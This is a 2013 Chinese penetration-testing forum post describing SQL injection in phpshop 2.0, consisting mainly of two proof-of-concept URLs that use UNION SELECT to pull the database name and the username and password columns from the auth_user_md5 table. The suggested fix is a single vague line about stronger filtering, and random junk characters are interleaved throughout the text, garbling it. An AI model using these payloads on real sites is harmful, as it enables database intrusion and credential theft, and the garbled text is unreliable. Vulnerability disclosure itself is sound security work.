中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]
作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability5 ], D" y( e9 I8 A/ _3 q6 E

" [, X, n* }( E' @$ F3 [, T作者 : By onestree
1 V1 t: q6 x) K* K下载地址 : http://code.google.com/p/phpshop/downloads/list+ k0 Q+ J" D: l/ I8 p5 S7 }5 d
测试地址: windows 7 / ubuntu) ?9 o5 N3 A5 s# c0 U, e2 \  A

' g% T& h) x8 B6 ? , \6 o& g# D+ T  \% U8 Y2 ]  M
SQLi p0c:
& ?* Q! n; H; r/ N# z5 a
0 _; B2 t+ ?7 X) i==================
2 [4 R% C$ F' K- n. T& n7 S) C
4 S( z* w5 R( b) [7 y0 Fhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
7 S: K$ `' v" N/ v: T( kunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --1 [) M, U, M* R  p  d

* {# N' J! k* L7 L- w7 Q6 d$ chttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--$ r  {3 k4 N/ }. |

6 E7 y$ X0 Z" e. g修复:
" ^; }5 K8 e* j9 A加强过滤
) t( n! T4 ]. P) u3 M9 c" I9 l' ]4 S) Q& F
: ^# u- M  A" L




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2